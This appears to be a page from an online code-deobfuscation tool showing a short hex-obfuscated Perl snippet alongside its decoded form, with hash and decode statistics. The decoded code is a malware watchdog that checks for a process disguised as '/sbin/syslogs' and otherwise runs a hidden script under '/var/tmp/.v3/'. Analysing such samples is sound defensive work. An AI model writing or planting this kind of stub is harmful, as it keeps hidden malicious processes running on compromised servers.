Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

open PROS, "\x70\x73\x20\x2D\x65\x66\x7C\x67\x72\x65\x70\x20\x2F\x73\x62\x69\x6E\x2F\x..

Decoded Output download

<?   
 
open PROS, "ps -ef|grep /sbin/syslogs |"; 
 
 
while ($line = <PROS>){ 
unless ($line =~ m/grep/){ 
exit; 
} 
} 
 
$t = "perl /var/tmp/.v3/n.pl"; 
exec "$t"; ?>

Did this file decode correctly?

Original Code



open PROS, "\x70\x73\x20\x2D\x65\x66\x7C\x67\x72\x65\x70\x20\x2F\x73\x62\x69\x6E\x2F\x73\x79\x73\x6C\x6F\x67\x73\x20\x7C";


while ($line = <PROS>){
unless ($line =~ m/grep/){
exit;
}
}

$t = "\x70\x65\x72\x6C\x20\x2F\x76\x61\x72\x2F\x74\x6D\x70\x2F\x2E\x76\x33\x2F\x6E\x2E\x70\x6C";
exec "$t";

Function Calls

None

Variables

None

Stats

MD5 241b2b4a84c460c9021be0931b460aea
Eval Count 0
Decode Time 85 ms